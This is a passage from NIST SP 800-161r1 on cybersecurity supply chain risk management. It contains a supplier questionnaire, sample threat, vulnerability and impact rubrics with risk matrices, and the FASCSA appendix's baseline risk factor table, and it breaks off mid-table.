Does the manufacturer implement formal
enterprise roles and governance
responsible for the implementation and
oversight of secure engineering across the
development or manufacturing process for
product offerings?
Manufacturer
Does the manufacturer have processes for
product integrity that conform to standards
such as ISO 27036 or SAE AS6171?
Manufacturer
Is the product compliant with Federal
Information Processing Standards (FIPS)
140-2? If yes, please provide the FIPS
level.
Manufacturer
Does the manufacturer document and
communicate security control requirements
for your hardware, software, or solution
offering?
Manufacturer
Has the manufacturer received fines or
sanctions from any governmental entity or
regulatory body in the past year related to
delivery of the product or service? If yes,
please describe.
Manufacturer
Has the manufacturer experienced
litigation claims over the past year related
to the delivery of the product or service? If
yes, please describe.
Manufacturer
Does the manufacturer provide a bill of
materials (BOM) for the products, service,
or components, including all logic-bearing
(e.g., readable, writable, programmable)
hardware, firmware, and software?
Manufacturer
For hardware components included in the
product or service offering, does the
supplier only buy from original equipment
manufacturers or licensed resellers?
Supplier
Does the manufacturer have a policy or
process to ensure that none of your
suppliers or third-party components are on
any banned list?
Manufacturer
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
227
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
How does the manufacturer prevent
malicious and/or counterfeit IP
components in their product offerings or
solutions?
Manufacturer
Does the manufacturer manage the
integrity of IP for its products or service
offerings?
Manufacturer
How does the manufacturer assess,
prioritize, and remediate reported product
or service vulnerabilities?
Manufacturer
How does the manufacturer ensure that
product or service vulnerabilities are
remediated in a timely period to reduce the
window of opportunity for attackers?
Manufacturer
Does the manufacturer maintain and
manage a Product Security Incident
Reporting and Response program (PSRT)?
Manufacturer
What is the manufacturer’s process for
ensuring that customers and external
entities (such as government agencies) are
notified of an incident when their product
or service is impacted?
Manufacturer
4.1.4. Threat Analysis
Define threat analysis as well as the criteria that will be utilized to assess the threat of the
product, service, or supplier. Include a rubric with categorical definitions to encourage the
transparency of assessment results.
Sample Text
The C-SCRA threat analysis evaluates and characterizes the level of threat to the integrity,
trustworthiness, and authenticity of the product, service, or supplier as described below.
This analysis is based on a threat actor’s capability and intent to compromise or exploit the
product, service, or supplier being introduced into the supply chain. Following completion of the
analysis, one of the following threat levels is assigned:
• Critical: Information indicates that an adversarial or non-adversarial threat is imminent
(e.g., an adversary is actively engaged in subversion, exploitation, or sabotage of the
product, service, or supplier).
• High: Information indicates that an adversarial or non-adversarial threat is imminent
(e.g., significant drought in the geographical area combined with location characteristics
of the asset yields high potential for forest fires).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
228
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Moderate: Information indicates that an adversarial or non-adversarial threat has an
average potential to impact or target the enterprise (e.g., a specific adversarial threat
exists but lacks either the capability or the intent to engage in subversion, exploitation or
sabotage of the product, service, or supplier).
• Low: Information indicates that adversarial or non-adversarial threats are non-existent,
unlikely, or have below average potential to impact or target the enterprise (e.g.,
adversarial threats lack both the capability and the intent to engage in subversion,
exploitation, or sabotage of the product, service, or supplier).
To appropriately assign the above threat analysis designation, C-SCRM PMOs and requestors
should leverage the Information Gathering and Scoping questionnaire to coordinate the
collection of information related to the product, service, or supplier’s operational details,
ownership structure, key management personnel, financial information, business ventures,
government restrictions, and potential threats. Additional investigations of the aforementioned
topics should be performed if red flags are observed during initial data collection.
4.1.5. Vulnerability Analysis
Define vulnerability analysis and the criteria that will be utilized to assess the vulnerability of
the product, service, or supplier being assessed. Include a rubric with categorical definitions to
encourage transparency behind assessment results.
Sample Text
The C-SCRA vulnerability analysis evaluates and then characterizes the vulnerability of the
product, service, or supplier throughout its life cycle and/or engagement. The analysis includes
an assessment of the ease of exploitation by a threat actor with moderate capabilities. This
analysis is based on a threat actor’s capability and intent to compromise or exploit the product,
service, or supplier being introduced into the supply chain. Following completion of the analysis,
one of the following threat levels is assigned:
• Critical: The product, service, or supplier contains vulnerabilities or weaknesses that are
wholly exposed and easily exploitable.
• High: The product, service, or supplier contains vulnerabilities or weaknesses that are
highly exposed and reasonably exploitable.
• Moderate: The product, service, or supplier contains vulnerabilities or weaknesses that
are moderately exposed and difficult to exploit.
• Low: The product, service, or supplier contains vulnerabilities and weaknesses with
limited exposure and are unlikely to be exploited.
To appropriately assign the above vulnerability analysis designation, C-SCRM PMOs and
requestors should coordinate the collection of information related to the product, service, or
supplier’s operational details, exploitability, service details, attributes of known vulnerabilities,
and mitigation techniques.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
229
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
4.1.6. Impact Analysis
Define impact analysis and the criteria that will be utilized to assess the criticality of the
product, service, or supplier being assessed. Include a rubric with categorical definitions to
encourage the transparency of assessment results.
Sample Text
The C-SCRA impact analysis evaluates and then characterizes the impact of the product, service,
or supplier throughout its life cycle and/or engagement. The analysis includes an end-to-end
functional review to identify critical functions and components based on an assessment of the
potential harm caused by the probable loss, damage, or compromise of a product, material, or
service to an enterprise’s operations or mission. Upon completion of the analysis, one of the
following impact levels is assigned:
• Critical: The product, service, or supplier’s failure to perform as designed would result
in a total enterprise failure or a significant and/or unacceptable level of degradation of
operations that could only be recovered with exceptional time and resources.
• High: The product, service, or supplier’s failure to perform as designed would result in
severe enterprise failure or a significant and/or unacceptable level of degradation of
operations that could only be recovered with significant time and resources.
• Moderate: The product, service, or supplier’s failure to perform as designed would result
in serious enterprise failure that could be readily and quickly managed with no long-term
consequences.
• Low: The product, service, or supplier’s failure to perform as designed would result in
few adverse effects on the enterprise, and those effects could be readily and quickly
managed with no long-term consequences.
To appropriately assign the above impact analysis designation, C-SCRM PMOs and requestors
should coordinate the collection of information related to the enterprise’s critical functions and
components, the identification of the intended user environment for the product or service, and
supplier information.
4.1.7. Risk Response Analysis
Define risk analysis and the criteria that will be utilized to assess the scoring of the product or
service being assessed. Include a rubric with categorical definitions to encourage the
transparency of assessment results.
Sample Text
The C-SCRA risk exposure reflects a combined judgement based on likelihood and impact
analyses. The likelihood analysis is scored via a combination of the aforementioned threat and
vulnerability analysis score, as outlined in the figure below.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
230
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Likelihood Level
Threat
Vulnerability
Low
Moderate
High
Critical
Critical
Moderately
Likely
Highly
Likely
Very Likely
Very Likely
High
Moderately
Likely
Highly
Likely
Highly
Likely
Very Likely
Moderate
Unlikely
Moderately
Likely
Highly
Likely
Highly
Likely
Low
Unlikely
Unlikely
Moderately
Likely
Moderately
Likely
Fig. D-2: Example Likelihood Determination
The C-SCRA risk exposure is then aggregated based on that likelihood score and the impact
score. If multiple vulnerabilities are identified for a given product or service, each vulnerability
shall be assigned a risk level based on its likelihood and impact.
Overall Risk Exposure
Likelihood
(threat and
vulnerability)
Impact
Low
Moderate
High
Critical
Very Likely
Moderate
High
Critical
Critical
Highly Likely
Moderate
Moderate
High
Critical
Moderately
Likely
Low
Moderate
High
High
Unlikely
Low
Low
Moderate
High
Fig. D-3: Example Risk Exposure Determination
The aforementioned risk analyses and scoring provide measures by which the enterprise
determines whether or not to proceed with procurement of the product, service, or supplier.
Decisions to proceed must be weighed against the risk appetite and tolerance across the tiers of
the enterprise, as well as the mitigation strategy that may be put in place to manage the risks as a
result of procuring the product, service, or supplier.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
231
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
4.1.8. Roles and Responsibilities
State those responsible for the C-SCRA policies, as well as its key contributors. Include the role
and name of each individual or group, as well contact information where necessary (e.g.,
enterprise affiliation, address, email address, and phone number).
Sample Text
• The C-SCRM PMO shall:
o Maintain C-SCRA policies, procedures, and scoring methodologies;
o Perform C-SCRA standard operating procedures;
o Liaise with requestors seeking to procure a product, service, or supplier; and
o Report C-SCRA results to leadership to help inform enterprise risk posture.
• Each requestor shall:
o Complete C-SCRA request forms and provide all required information,
o Address any information follow-up requests from the C-SCRM PMO resource
completing the C-SCRA, and
o Adhere to any stipulations or mitigations mandated by the C-SCRM PMO
following approval of a C-SCRA request.
4.1.9. Definitions
List the key definitions described within the policy, and provide enterprise-specific context and
examples where needed.
Sample Text
• Procurement: The process of obtaining a system, product, or service.
4.1.10. Revision and Maintenance
Define the required frequency for updating the C-SCRA template. Maintain a table of revisions
to enforce version control. C-SCRA templates are living documents that must be updated and
communicated to all appropriate individuals (e.g., staff, contractors, and suppliers).
Sample Text
The enterprise’s C-SCRA template must be reviewed on an annual basis, at a minimum, since
changes to laws, policies, standards, guidelines, and controls are dynamic and evolving.
Additional criteria that may trigger interim revisions include:
• A change of policies that impact the C-SCRA template,
• Significant C-SCRM events,
• The introduction of new technologies,
• The discovery of new vulnerabilities,
• Operational or environmental changes,
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
232
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Shortcomings in the C-SCRA template,
• A change of scope, and
•
Other enterprise-specific criteria.
Sample Text
Table D-14: Version Management Table
Version
Number
Date
Description of
Change/Revision
Section/Pages
Affected
Changes made by
Name/Title/Enterprise
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
233
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX E: FASCSA46
INTRODUCTION
Purpose, Audience, and Background
This Appendix augments the content in NIST SP 800-161, Rev. 1 and provides additional
guidance specific to federal executive agencies related to supply chain risk assessment factors,
assessment documentation, risk severity levels, and risk response.
As discussed in the introductory section of the main body of SP 800-161, Rev 1., The Federal
Acquisition Supply Chain Security Act of 2018 (FASCSA), Title II of the SECURE Technology
Act (P. L. 115-390), was enacted to improve executive branch coordination, supply chain risk
information (SCRI) sharing, and actions to address supply chain risks. The law established the
Federal Acquisition Security Council (FASC),47 an interagency executive body at the federal
enterprise level. This council is authorized to perform a range of functions intended to reduce the
Federal Government’s supply chain risk exposure and risk impact.
The FASCSA provides the FASC and executive agencies with authorities relating to mitigating
supply chain risks, to include the exclusion and/or removal of sources and covered articles.48 The
law also mandates that agencies conduct and prioritize supply chain risk assessments (SCRAs).
The guidance in this appendix is specific to this FASCSA requirement, as described below, and
addresses the need for a baseline level of consistency and alignment between agency-level C-
SCRM risk assessment and response functions and those SCRM functions that occur at the
government-wide level by authorized bodies such as the FASC.
Scope
IN SCOPE
This appendix is primarily focused on providing agencies with additional guidance concerning
Section 1326 (a) (1) of the FASCSA,49 which requires executive agencies to assess the supply
chain risk posed by the acquisition and use of covered articles and to respond to that risk as
appropriate. The law directs agencies to perform this activity and other SCRM activities
described therein, consistent with NIST standards, guidelines, and practices.
OUT OF SCOPE
Section 4713 of the FASCSA50 pertains to executive agencies’ authority to carry out covered
procurement actions. Specific guidance concerning those actions is outside of the scope of this
46 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
47 For additional information about the FASC authorities, membership, functions, and processes, readers should refer to the Federal Acquisition
Security Council Final Rule, 41 CFR Parts 201 and 201-1. See: https://www.govinfo.gov/content/pkg/FR-2021-08-26/pdf/2021-17532.pdf.
48 As defined by FASCSA, a covered article means: Information technology, including cloud computing services of all types; telecommunications
equipment or telecommunications services; the processing of information on a federal or non-federal information system, subject to the
requirements of the Controlled Unclassified Information program; all IoT/OT (e.g., hardware, systems, devices, software, or services that include
embedded or incidental information technology).
49 See 41 USC 1326 (a) (1)
50 41 USC 4713
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
234
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
appendix. The FASCSA requires the Federal Acquisition Regulatory (FAR) Council to prescribe
such regulations as may be necessary to carry out this section. NIST does and will continue to
work closely with interagency colleagues within the FASC and the federal acquisition
community to help ensure harmonized guidance.
This appendix does not provide guidance on how to conduct an assessment, which is best
addressed through role-based training, education, and work experience. NIST SP 800-30, Rev. 1,
Guide for Conducting Risk Assessments, is also a recommended reference. Agencies should take
steps to ensure that personnel with current and prospective responsibilities for performing
SCRAs have adequate skills, knowledge, and depth and breadth of experience sufficient to
identify and discern indications of cybersecurity risk in the supply chain and the assessment of
those risks. Agencies are strongly encouraged to invest in training to grow and sustain
competencies in analytic skills and SCRM knowledge. Counter-intelligence and security training
are also strongly recommended for C-SCRM PMO staff or those personnel with responsibilities
dedicated to performing SCRAs. Building this capability helps to ensure that there is sufficient
understanding and awareness of adversarial-related supply chain risks in the workforce while
also developing a risk management cadre to provide advice and support for risk response
decisions and actions.
Relationship to NIST SP 800-161, Rev. 1, Cybersecurity Supply Chain Risk Management
Practices for Systems and Organizations
The practices and processes to assess, respond to, and otherwise manage cybersecurity risks in
the supply chain are discussed at length throughout the main body and appendices of NIST SP
800-161, Rev. 1. This appendix provides supplemental expanded guidance that is tailored and
applicable to federal agencies. This guidance describes the scope and type of supply chain risk
assessment information and documentation used to support and advise risk response decisions
and actions, both internally to senior agency officials and externally to bodies such as the FASC.
This augmented guidance is also intended to ensure a baseline consistency and sufficiency of
processes and SCRI utilized for assessment and documentation and to facilitate information
sharing and recommendations to applicable decision makers, whether at a given agency or at the
government-wide level. Within the constraints of requisite support for federal enterprise-level
analysis and decision-making, agencies continue to have the flexibility to assess and manage
their supply risk in a manner consistent with the broader guidance outlined in the main body and
other appendices of NIST SP 800-161, Rev.1 and their policies, mission and priority needs, and
existing practices (to the extent that these are sufficient).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
235
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FASCSA Supply Chain Risk Definition vs. NIST SP 800-161, Rev. 1, Cybersecurity-Supply
Chain Risk Definition
Agencies should take note that the FASCSA definition of supply chain risk is narrowly focused
on risk that arises from an assessment that there is intent and capability by an adversarial threat
actor to conduct malicious activity or otherwise cause malicious harm. In contrast, NIST’s
definition and scope of cybersecurity supply chain risk is otherwise consistent with the FASCSA
definition but broader in scope as it includes both adversarial and non-adversarial-related risks.
Consistent with the FASCSA’s direction that agencies rely upon NIST standards and guidance,
agencies need to ensure that their assessment and risk response activities address all applicable
cybersecurity risks throughout the supply chain.
SUPPLY CHAIN RISK ASSESSMENTS (SCRAs)
General Information
The FASCSA requires agencies to conduct and prioritize supply chain risk assessments when
acquiring a covered article as well during its use or performance. In most cases, this also
compels the need to assess the source associated with the covered article. Supply chain risk
assessments conducted by agencies are highly dependent on the operating environment and use
case associated with a covered article. Agencies have flexibility in how they apply NIST
guidelines to their operations and there is not – nor should there be – a one-size-fits-all approach
to conducting a SCRA. However, to facilitate assessments that may need to take place at the
government-wide level to evaluate risks that may impact national security or multiple agency
missions, there is a need to ensure that agencies’ SCRA information and documentation reflect
an acceptable baseline level of due diligence and standardization.
In general, information used for an assessment will be comprised of up to three categories of
inputs:
1) Purpose and context information (i.e., use-case specific) used to understand the risk
environment and to inform and establish risk tolerance relative to the use case
2) Data or information obtained from the source
3) All-source information, which may come from publicly available data, government sources
(may include classified sources), and/or commercial fee-based sources
The purpose and context, as well as when an assessment of a supplier and/or covered article is
performed in the SDLC or procurement life cycle, will drive variations in terms of focus and
scope with regard to what type, how much, and from what sources information used in an
assessment is obtained.
The FASCSA recognizes that agencies have constrained resources, but it is necessary to
prioritize the conduct of SCRAs.51 Prioritization is not meant to be understood as only a subset
of sources or covered articles that should be assessed. Rather, agencies should establish a tiered
51 See Section 1326 (a)(2) of the FASCSA.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
236
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
set of priority levels commensurate with the criticality and potential for risk impact. This tiering
can then be used to guide or compel the timing of, order, scope, and frequency of SCRAs.
In addition to externally driven priorities (e.g., government-wide policy direction, regulatory
requirement, etc.) and agency-defined prioritization factors, NIST SP 800-161, Rev 1. instructs
agencies to prioritize assessments concerning critical suppliers (i.e., sources) and critical systems
and services, as compromise of these sources and covered articles is likely to result in greater
harm than something determined to be non-critical. For these assessments, agencies should
address all baseline risk factors described in the Baseline Risk Factors (common, minimal)
section below (augmenting and weighing the factors, as appropriate to the use case, to ensure
appropriate consideration of both adversarial and non-adversarial-related risks). For a given non-
critical source or non-critical covered article, agencies have discretion – consistent with their
own internal policies and practices and absent other mandates – as to whether all, some, and to
what extent the baseline risk factors described in this appendix should be considered when
assessing supply chain risk. However, if and when there are one or more credible findings that
indicate that a substantial supply chain risk may or does exist (see Supply Chain Risk Severity
Schema, described below), it may require that a more comprehensive assessment be completed,
inclusive of all of the baseline risk factors or more robust research and analysis of the baseline
risk factors. (See the risk response guidance described in the Risk Response Section below.)
The responsibility and accountability for determining the priority levels for SCRAs, evaluating
impact, making risk response decisions, and taking actions based on the findings in a SCRA are
inherently governmental functions and cannot be outsourced. However, some agencies may rely
on a qualified third party for support in conducting research, documenting findings, and
reviewing relevant information. To aid in their research and assessment activities, agencies may
also acquire access to commercially available data or tools. Appropriate requirements should be
included in solicitations and contracts to address access to, handling, and safeguarding SCRI.
Failure to do this, in and of itself, reflects a security control gap and creates an unmitigated
supply chain risk. Moreover, such a gap can undermine the entire purpose of an agency’s SCRA
efforts or even facilitate the success of foreign adversaries’ malicious actions against the United
States. Additionally, agency personnel should follow the guidance and direction of their ethics
officials and legal counsel to ensure that protections are in place to guard against conflicts of
interest and inappropriate or unauthorized access to or disclosure of information, as SCRI may
be sensitive, proprietary, or – in certain instances – classified. For the latter category of
information, agencies must ensure adherence to laws, policies, and procedures governing
classified information and limit access to only those personnel who have the proper clearance,
authorized access, and need to know.
In all instances, personnel who support the conduct of an assessment have a duty and
responsibility to act prudently and objectively and to exercise reasonable care in researching and
analyzing a source or covered article as this SCRI underpins subsequent risk response decisions
and actions.
Baseline Risk Factors (Common, Minimal)
This section describes the baseline (common, non-exclusive) supply chain risk factors and
guidance that agencies should incorporate into (or map to the factors included in) their agency-
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
237
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
defined SCRA methodology. These factors are to be used as a guide to research, identify, and
assess risk for those SCRAs pertaining to critical sources or critical covered articles, at a
minimum. A common baseline of risk factors also helps to ensure that due diligence is
consistently conducted as part of the analysis that informs risk response decisions and actions,
whether these occur at various levels within an agency or at the federal enterprise-level.
Agencies should assess additional factors beyond the baseline factors, as deemed relevant and
appropriate to a given assessment use case.
Objectives for establishing this baseline set of factors include:
• Level setting evaluations for sources and covered articles;
• Ensuring that the minimum necessary information is available to the FASC, when
required;
• Promoting consistency and comparability across agencies;
• Aiding the conduct of more sophisticated analyses, such as trend analysis or causal or
correlation relationships between identified indicators of risk and realized risks; and
• Establishing and maintaining a base of information sufficient to identify and understand
potential mitigation options and inform prioritization or risk response trade-off
analysis/decisions.
Table E-1 that follows includes a list of the baseline risk factors and their corresponding
definition or description. These factors are also consistent with and align to the factors included
in the FASC Final Rule.52 The right-most column includes a list of the type of information that
may be identified and found to be an indicator of risk. This list is intended to be used as a
reference aid and is not all-inclusive of the possible indicators of risk. Information that pertains
to context-based risk factors should be known by the agency and is often already documented
(e.g., in a system security plan or acquisition plan). An assessment of these use case-specific and
context-based factors helps to understand inherent risk,53 guides the identification and selection
of needed cybersecurity and SCRM controls and procurement requirements, and aids in
determining the risk tolerance threshold for a covered article associated with a given use case.
The next set of vulnerability and threat risk factors is focused on risk that may be inherited from
the covered article itself or the associated source or supply chain. Agencies will assess the
findings associated with these baseline (and any additional) factors to provide an informed
judgment about whether there are indications of threat from an adversarial threat actor, the
likelihood for compromise or harm and resultant impact, and whether the assessed risk
pertaining to a source and/or covered article is within or exceeds their acceptable risk tolerance
level.
52 CFR Part 201-1.300 Evaluation of Sources and Covered Articles
53 Inherent risk, defined for this purpose, is the current risk level given the existing set of controls.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
238
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table E-1: Baseline Risk Factors
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
Use-Case/Context (Inherent Risk)
Purpose
Understand the
requirement for product or
service and how it will be
or is being used.
• Options available in the marketplace to
fulfill need
• Urgency of need
• Duration of need
Criticality
Identify if the product,
service, or source is
deemed a critical system,
system component,
service, or supplier. Refer
to the main body and
glossary of NIST SP 800-
161, Rev. 1 for additional
guidance. Also see
Appendix F for
information regarding EO-
critical software.
• Supplier or covered article (or
component therein) performs or is
essential to (or, if compromised, could
result in harm to) a mission-critical
function, life safety, homeland security,
critical infrastructure, or national
security interest or has an
interdependency with another covered
article performing or essential to such
functions
Information and
Data
Understand and document
the type, amount, purpose,
and flow of federal
data/information used by
or accessible by the
product, service, and/or
source.
• Requirement or ability to access CUI or
classified information
• Federal information will be managed
and/or accessible for external persons or
entities other than the prime contractor
or supplier
• Product or service data inputs or outputs
can affect life safety if compromised
Reliance on the
covered article or
source
Understand and articulate
the degree to which an
agency is reliant on a
covered article and/or
source and why.
• Prevalence of use of the product or
service by the agency
• Single source of supply
• Product or service availability in the
marketplace
• Availability of (or acceptable
alternatives to) the product, service, or
source
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
239
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
User/operational
environment in
which the covered
article is used or
installed or service
performed
For products included in
systems or as a system
component, the user
environment should be
described in the System
Security Plan and/or C-
SCRM System Plan. For
labor-based services,
understand and document
relevant information about
the user environment (i.e.,
place of performance) that
may expose the agency to
risk.
• The system and/or C-SCRM Security
Plan should identify and document risks
and describe the applicable, selected
security controls implemented or
required to be implemented to mitigate
those risks
• Relevant environment considerations
that give rise to risk concerns should be
documented in procurement plans and
applicable controls addressed in
solicitations and contracts
External agency
interdependencies
Understand and identify
interdependencies related
to data, systems, and
mission functions.
• Covered article performs a function in
support of a government-wide shared
service
• Covered article exchanges data with
another agency’s mission critical
system
• Contractor maintains an analytic tool
that stores government-wide CUI data
Vulnerabilities or Threats (Inherited Risk)
Functionality,
features, and
components of the
covered article
Information informs a
determination as to
whether the product or
service is fit for purpose”
and the extent to which
there is assurance that the
applicable C-SCRM
dimensions (see Section
1.4 of main body) are
satisfied, and/or there are
inherent or unmitigated
weaknesses or
vulnerabilities.
• Ability of the source to produce and
deliver the product or service as
expected
• Built-in security features and
capabilities or lack thereof
• Who manages or has ultimate control
over security features
• Secure configuration options and
constraints
• Management and control of security
features (who, how)
• Network/internet connectivity
capability or requirements and methods
of connection
• Software and/or hardware bill of
material
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
240
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
• Any transmission of information or
data (to include, if known) the
identification of the source and location
of the initiator or recipient of the
transmission) to or by a covered article
necessary for its function
Company (i.e.,
source)
Information
Information about the
company, to include size,
structure, key leadership,
and its financial health.
• Corporate family tree
• Years in business
• Merger and acquisition activity (past
and present)
• Contracts with foreign governments
• Customer base and trends
• Association or previous experience by
company leadership (Board or C-suite
in foreign government or military
service)
• Stability or high turnover or firings at
senior leadership level
• Number of employees at specific
location and company-wide
• Investors/investments
• Patent sales to foreign entities
• Financial metrics and trends
• Financial reports/audits
Quality/Past
Performance
Information about the
ability of the source to
produce and deliver
covered articles as
expected. This includes an
understanding of the
quality assurance practices
associated with preventing
mistakes or defects in
manufactured/ developed
products and avoiding
problems when delivering
solutions or services to
customers.
• Past performance information
• Relevant customer ratings or complaints
• Recalls
• Quality metrics
• Evidence of a quality program and/or
certification
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
241
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
Personnel
Information about
personnel affiliated with
or employed by the source
or an entity within the
supply chain of the
product or service.
• The supplier’s program to vet its
personnel, to include whether there is an
insider threat program, and/or whether
the supplier performs background
checks and prior employment
verification
• Hiring history from a foreign country or
foreign adversary’s intelligence,
military, law enforcement or other
security services
• Turnover rate
• Staffing level and competencies
• Evidence of questionable loyalties and
unethical or illicit behavior and
activities
Physical
Information associated
with the physical aspects
of the environment,
structures, facilities, or
other assets sufficient to
understand if/how they are
secured and the
consequences if damaged,
unavailable, or
compromised.
• Evidence of the effectiveness of
physical security controls, such as
procedures and practices that ensure or
assist in the support of physical security
• Proximity to critical infrastructure or
sensitive government assets or mission
functions
• Natural disasters or seismic and climate
concerns
Geopolitical
Information associated
with a geographic location
or region of relevance to
the source or the supply
chain associated with the
source, product, and/or
service.
• Location-based political upheaval or
corruption
• Trade route disruptions
• Jurisdictional legal requirements
• Country or regional instability
Foreign
Ownership,
Control, or
Influence (FOCI)
Ownership of, control of,
or influence over the
source or covered
article(s) by a foreign
interest (e.g., foreign
government or parties
owned or controlled by a
foreign government, or
other ties between the
source and a foreign
• Country is identified as a foreign
adversary or country of special concern
• Source or its component suppliers have
headquarters, research, development,
manufacturing, testing, packaging,
distribution, or service facilities or other
operations in a foreign country,
including a country of special concern
or a foreign adversary
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
242
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
government) has the
power, direct or indirect,
whether or not exercised,
to direct or decide matters
that affect the
management or operations
of the company.
• Identified personal and/or professional
ties between the source – including its
officers, directors or similar officials,
employees, consultants, or contractors –
and any foreign government
• Implications of laws and regulations of
any foreign country in which the source
has headquarters, research development,
manufacturing, testing, packaging,
distribution, or service facilities or other
operations
• Nature or degree of FOCI on a supplier
• FOCI of any business entities involved
in the supply chain, to include
subsidiaries and subcontractors, and
whether that ownership or influence is
from a foreign adversary of the United
States or country of concern
• Any indications that the supplier may
be partly or wholly acquired by a
foreign entity or a foreign adversary
• Supplier domiciled in a country
(without an independent judicial
review) where the law mandates
cooperation, to include the sharing of
PII and other sensitive information,
with the country’s security services
• Indications that demonstrate a foreign
interest’s capability to control or
influence the supplier’s operations or
management or that of an entity within
the supply chain
• Key management personnel in the
supply chain with foreign influence
from or with a connection to a foreign
government official or entities, such as
members of the board of directors,
officers, general partners, and senior
management official
• Foreign nationals or key management
personnel from a foreign country
involved with the design, development,
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
243
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
manufacture or distribution of the
covered article
• Supplier’s known connections to a
foreign country or foreign adversary’s
intelligence, law enforcement, or other
security service
• Supplier is domiciled in or
influenced/controlled by a country that
is known to conduct intellectual
property theft against the United States
Compliance/Legal Information about non-
compliance, litigation,
criminal acts, or other
relevant legal
requirements
• Record of compliance with pertinent
U.S. laws, regulations, contracts, or
agreements
• Sanctions compliance
• Trade controls compliance
• Judgments/Fines
Fraud, Corruption,
Sanctions, and
Alignment with
Government
Interests
Information about past or
present fraudulent activity
or corruption and being
subject to suspension,
debarment, exclusion, or
sanctions (also see Table
E-2 and discussion
immediately preceding
table)
• Civil or criminal litigation
• Past history or current evidence of
fraudulent activity
• Source’s history of committing
intellectual property theft
• Supplier’s dealings in the sale of
military goods, equipment, or
technology to countries that support
terrorism or proliferate missile
technology or chemical or biological
weapons and transactions identified by
the Secretary of Defense as “posing a
regional military threat” to the interests
of the United States
• Source’s history regarding unauthorized
technology transfers
Cybersecurity
Information about the
cybersecurity practices,
vulnerabilities, or
incidents of the source,
product, service, and/or
supply chain
• Evidence of effective cybersecurity
policies and practices
• Supplier’s history as a victim of
computer network intrusions
• Supplier’s history as a victim of
intellectual property theft
• Information about whether a foreign
intelligence entity unlawfully collected
or attempted to acquire an acquisition
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
244
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
item, technology, or intellectual
property
• Existence of unmitigated cybersecurity
vulnerabilities
• Indication of malicious activity –
including subversion, exploitation, or
sabotage – associated with the supplier
or the covered article
• Any unauthorized transmission of
information or data by a covered article
to a country outside of the United States
*Counterfeit and
Non-Conforming
Products (include
